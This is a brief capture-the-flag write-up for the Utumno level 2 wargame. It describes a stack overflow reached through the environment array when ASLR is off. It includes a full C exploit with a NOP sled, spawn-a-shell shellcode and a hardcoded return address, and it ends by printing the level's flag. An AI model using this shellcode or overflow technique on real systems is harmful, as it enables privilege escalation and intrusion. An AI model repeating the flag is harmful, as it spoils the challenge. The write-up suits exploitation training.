first we can see there is no protection, and also ASLR disabled.

then, after analyzing the code i realized that i can pass at the 9th place of envp some content that will be written to a buffer, and also i found out that the ret address is found in the stack after 16 bytes. so, what we need to do is override the ret address and put our shellcode.

because we run with envp, it overrides our regular SHELLCODE environment variable.

we need to find the address of the shellcode, try debugging and find it. for example: (here i debug and put breakpoint on where the main of /utumno/utumno2 is find, it won’t change because ASLR is turned off)

#include<stdio.h>
#include<unistd.h>

#define PATH "/utumno/utumno2"
#define POSISTION 16

#define SHELLCODE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x31\x58\xcd\x80\x89\xc3\x89\xd9\x6a\x46\x58\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x01\x58\xcd\x80"

int main() {
    char payload[POSISTION+4];
    int address_of_shellcode = 0xffffdf87;

    for(int i=0;i<POSISTION;i++)
        payload[i] = 'A';

    *((int*)(payload + POSISTION)) = address_of_shellcode;

    char *args[] = {NULL};
    char *envp[] = {"1","2","3","4","5","6","7",SHELLCODE,payload,NULL};
    execve(PATH, args, envp);
    return 0;
}

, only change the address_of_shellcode variable and this should work.

Flag: h3kVKJZuid